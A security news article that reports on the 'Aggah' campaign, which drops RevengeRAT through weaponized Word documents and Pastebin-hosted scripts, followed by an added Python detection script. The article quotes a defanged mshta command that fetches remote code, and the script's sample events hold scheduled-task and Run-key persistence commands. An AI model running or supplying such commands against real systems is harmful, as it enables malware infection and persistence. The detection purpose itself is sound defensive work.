Hackers Drop RevengeRAT Malware On Windows System Via Weaponized Word Document

by chebbi abir

A new malware campaign dubbed "Aggah" targets organizations in several countries with weaponized Word documents and infects victims by dropping the publicly available RevengeRAT, fetched from Pastebin.

Researchers from Palo Alto Networks recently observed a large-scale malware campaign in their telemetry and named it Aggah after the actor's alias "hagga".

The threat actors behind this campaign also make use of RevengeRAT, a publicly available remote access trojan for which many leaked builders are freely available.

The attackers target organizations in the Middle East, the United States, Europe, and Asia, across sectors such as technology, retail, manufacturing, state and local government, hospitality, medical, and other professional services.

Aggah Malware campaign Infection Process

The Aggah campaign mainly delivers its malicious Word document attachment via a spoofed email that poses as a legitimate message from a large financial institution in the Middle East.

Once the user opens the attached Word document, named "Activity.doc", it attempts to load a remote OLE document via template injection.

The document also tricks the user into enabling content so that the macro can run, and it insists that the document be opened only in desktop versions of Microsoft Word.

The remote OLE document then loads another heavily obfuscated Excel document whose obfuscated macro decodes and runs the following command (which fetches a URL) via the VBA "Shell" command:

mshta hxxp://www.bitly[.]com/SmexEaldos3

Once the command executes, the victim is redirected to a blog hosted on blogspot[.]com that embeds JavaScript performing several activities, including an attempt to kill the Microsoft Defender process by removing its signature set.

According to Palo Alto Networks' research, the script hosted on Blogspot then carries out three main activities:

  1. Downloading a payload from a Pastebin URL
  2. Creating a scheduled task to periodically obtain and run a script from a Pastebin URL
  3. Creating an autorun registry key to obtain and run a script from a Pastebin URL

The malicious script hosted on Blogspot uses a Pastebin URL to obtain a portable executable payload and execute it.

Further analysis reveals that the payload is written in a .NET language and is named "Nuclear Explosion", a variant of RevengeRAT.

The script hosted at the Blogspot blog builds another command to create a scheduled task called “eScan Backup” that runs every 100 minutes.
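The chain described above leaves three process-level traces a defender can look for: mshta launched from an Office process with a remote URL, a schtasks creation with a short repeat interval whose action points at a paste/shortener host, and a reg add into a Run key with a similar action. The following script is an added example written for this article, not code from Palo Alto Networks or from the campaign; it runs simple detection rules over constructed Sysmon-style process-creation events. The bit.ly path and the task name "eScan Backup" come from the article; the Pastebin URL, the task action (mshta with a remote script) and the Run value name are constructed placeholders, not real indicators.

```python
import re

# Constructed sample events in a flattened "Key=Value|Key=Value" form
# (loosely modelled on Sysmon Event ID 1). Event 1 mirrors the article's
# mshta command; events 2 and 3 are the assumed persistence steps with a
# PLACEHOLDER Pastebin URL; events 4 and 5 are benign controls.
SAMPLE_EVENTS = [
    r'Image=C:\Windows\System32\mshta.exe|ParentImage=C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE|CommandLine=mshta hxxp://www.bitly[.]com/SmexEaldos3',
    r'Image=C:\Windows\System32\schtasks.exe|ParentImage=C:\Windows\System32\mshta.exe|CommandLine=schtasks /create /sc MINUTE /mo 100 /tn "eScan Backup" /tr "mshta hxxps://pastebin[.]com/raw/PLACEHOLDER" /f',
    r'Image=C:\Windows\System32\reg.exe|ParentImage=C:\Windows\System32\mshta.exe|CommandLine=reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v PlaceholderUpdate /t REG_SZ /d "mshta hxxps://pastebin[.]com/raw/PLACEHOLDER" /f',
    r'Image=C:\Windows\System32\mshta.exe|ParentImage=C:\Windows\explorer.exe|CommandLine=mshta.exe C:\Users\alice\AppData\Local\Temp\setup.hta',
    r'Image=C:\Windows\System32\notepad.exe|ParentImage=C:\Windows\explorer.exe|CommandLine=notepad.exe notes.txt',
]

# Hosts the article names as staging infrastructure (Pastebin, bit.ly,
# Blogspot). Illustrative, not an exhaustive list.
STAGING_HOSTS = ("pastebin.com", "bitly.com", "bit.ly", "blogspot.com")
OFFICE_PARENTS = ("winword.exe", "excel.exe", "powerpnt.exe")

# Match both fanged (http) and defanged (hxxp, [.]) URLs so defanged IoC
# lists can be fed in unchanged.
URL_RE = re.compile(r"h(?:tt|xx)ps?://[^\s\"']+", re.IGNORECASE)
RUN_KEY_RE = re.compile(r"\\CurrentVersion\\Run(?:Once)?\b", re.IGNORECASE)
SHORT_INTERVAL_MINUTES = 120  # anything at or below this is "periodic"


def parse_event(line):
    """Split 'Key=Value|Key=Value' into a dict with lower-cased keys.
    Assumes '|' does not occur inside values (true for the samples)."""
    fields = {}
    for part in line.split("|"):
        key, _, value = part.partition("=")
        fields[key.strip().lower()] = value.strip()
    return fields


def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def refang(url):
    return url.replace("[.]", ".").replace("hxxp", "http")


def analyze_event(fields):
    """Return the list of rule names that fire for one parsed event."""
    image = basename(fields.get("image", ""))
    parent = basename(fields.get("parentimage", ""))
    cmd = fields.get("commandline", "")
    urls = [refang(u) for u in URL_RE.findall(cmd)]
    hits = []

    # Rule 1/2: mshta with a remote URL, and mshta spawned by an Office app
    if image == "mshta.exe":
        if urls:
            hits.append("mshta_remote_url")
        if parent in OFFICE_PARENTS:
            hits.append("mshta_from_office")

    # Rule 3: short-interval scheduled task whose action carries a URL
    if image == "schtasks.exe" and re.search(r"/create\b", cmd, re.I):
        m = re.search(r"/sc\s+minute\b.*?/mo\s+(\d+)", cmd, re.I)
        if m and int(m.group(1)) <= SHORT_INTERVAL_MINUTES and urls:
            hits.append("schtask_periodic_remote_script")

    # Rule 4: Run/RunOnce key value whose data carries a URL
    if image == "reg.exe" and re.search(r"\badd\b", cmd, re.I) \
            and RUN_KEY_RE.search(cmd) and urls:
        hits.append("run_key_remote_script")

    # Rule 5: any reference to a known staging host
    if any(h in u.lower() for u in urls for h in STAGING_HOSTS):
        hits.append("staging_host")
    return hits


def scan(lines):
    """Return [(event_number, [rule, ...]), ...] for events that fired."""
    findings = []
    for n, line in enumerate(lines, 1):
        hits = analyze_event(parse_event(line))
        if hits:
            findings.append((n, hits))
    return findings


if __name__ == "__main__":
    for n, hits in scan(SAMPLE_EVENTS):
        print(f"event {n}: {', '.join(hits)}")
```

Events 1 to 3 fire, the local HTA launched from Explorer and notepad do not. In production the same rules would be expressed as a SIEM query over real process-creation telemetry; the interval threshold and host list are tuning knobs, and the mshta-from-Office rule is the one with the best signal-to-noise since legitimate documents rarely spawn mshta at all.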

“RevengeRAT is a commodity Trojan that has many leaked builders freely available in open source, which makes attributing the tool’s use to a specific actor or attack campaign difficult.”

“To create the RevengeRAT payload used in this campaign, the actor would use the RevengeRAT server to compile an executable configured with the appropriate fields.”

RevengeRAT Builder Socket Key Setting

At the end of the process, the RevengeRAT server creates a client executable with the default name "Client.exe", which is used to infect the victim's Windows system.[…]
